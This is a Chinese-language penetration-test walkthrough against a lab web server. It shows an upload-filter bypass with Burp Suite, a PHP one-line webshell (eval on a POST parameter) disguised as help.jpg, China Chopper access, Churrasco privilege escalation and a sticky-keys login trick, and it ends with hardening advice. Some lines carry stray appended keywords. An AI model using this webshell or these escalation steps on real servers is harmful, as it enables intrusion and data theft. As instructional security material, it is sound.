一次圖文並茂的***完整測試

 任務:某公司受權你對其服務器進行******。對某核心服務器進行***測試,據瞭解,該web服務器ip地址(10.1.1.178)存在敏感數據。php

      一、利用網站漏洞獲取該服務器shellweb

      二、新建一用戶並將權限提高至管理員sql

      三、得到服務器上的關鍵敏感數據(C:\console)內。shell

此文只做爲學習安全

wKiom1U2BPiQHRdAAAYFuisHevk399.jpg

***流程服務器

一、探測信息ide

二、利用漏洞獲得管理帳號密碼工具

三、找到後臺學習

四、登陸後臺取得web權限測試

若是發現直接有上傳漏洞就能夠利用


1.找到上傳漏洞

首先知道ip地址後打開網頁訪問找到站內上傳點

wKiom1U2BajCKGSsAANiioUqIIE272.jpg

wKiom1U2Bh_RkwgEAABdtyzAKpY309.jpgwKioL1U2CC2BkQX-AABelclnTTc694.jpg

上傳小馬文件報錯,只能上傳圖像文件,只能進行抓包

先進行代理設置

wKiom1U2BxnDIsoNAAKbGxAYTCc892.jpg

2.代理設置


谷歌插件Proxy SwitchySharp進行代理設置,而後開啓burpsuite抓包這裏就不作介紹了

軟件教學能夠百度去學習代理端口要同樣

wKioL1U2ClfjmK73AAHdUEfTOZY264.jpg


3.抓包分析,並改包上傳

開始抓包

wKioL1U2DWrg2XIdAAKKp02zgb8481.jpg

help.jpg內容

<?php 
eval($_POST['hao']);
?>

wKiom1U2DlaiNx72AAHCmiF1gr4543.jpg

修改從新上傳,上傳成功。

wKiom1U2DyiD9j8AAAExzL-QmvE029.jpg


4.獲取webshell權限

上述的http就是小馬地址,打開中國菜刀輸入

wKioL1U2EU2BMYt0AAECJ7v7kgE398.jpg

獲取webshell

wKiom1U2EB7R_yqfAAEwTNAGwJM566.jpg

5.提高管理權限

新建一用戶並將權限提高至管理員

用cmd命令獲取管理員權限

wKiom1U2ENbhjrhkAAC88AGiToQ304.jpg

添加一個用戶hao而後讓他加入管理員組但是失敗了,沒辦法只能在此使用工具提權

wKioL1U2EwfCN4bdAAJRffdxXNA800.jpg

wKiom1U2EavjoKuqAAJVt5xGl88071.jpg

wKioL1U2EweAIZaYAAArE4qSqlQ052.jpg

上傳腳本,而後重命名,並把php腳本複製到剛纔腳本里從新命名後綴php

wKioL1U2FWmTVFQtAAEqJxm0-B8431.jpg

在網站提權中咱們常常會使用到這些工具Churrasco.exe (巴西烤肉) 

若是說webshell不能執行cmd那麼咱們就須要上傳一個cmd

若是說上傳cmd後不能添加用戶那麼我咱們就須要上傳軟件提權

wKiom1U2FbHC238HAAQMYWX1egY815.jpg

設置終端路徑

wKioL1U2F7Xh0tu_AACD0UkCMRg003.jpg

提權不成功沒有administrators組

wKiom1U2HN3RGMGMAADFkQmVZEY840.jpg

進入遠程桌面登錄界面  按shift5次獲得cmd whoami /all

wKiom1U2HDuzWL63AAGtPzpAouU489.jpg

咱們找到useras這個組加入進去就ok了

wKiom1U2HtyCwPUsAAEUuznC8SY331.jpg

wKiom1U2Ht3yXEJ5AACuYE15Jms503.jpg

一次圖文並茂的***結束了。拷貝敏感數據就能夠了,讓你們以爲***不在神祕,其實更高層次的技術也在研究中,下次帶來sqlmap 注入實踐教程。

6.安全建議:從上述***測試中發現該服務器

1.及時修補系統中的安全漏洞

2.細化服務器文件目錄權限,杜絕權限漏洞

3.對於上傳權限,能夠經過修改服務器的配置來實現對這個漏洞的預防。不少網站都容許用戶上傳必定數量的圖片、Flash 等,不少時候網站開發人員爲了往後管理方便,對上傳的文件都統一放到指定的一個文件夾裏面,管理員只要對該文件夾的執行權限設置成「無」,這樣必定程度能夠對漏洞進行預防。

相關文章
相關標籤/搜索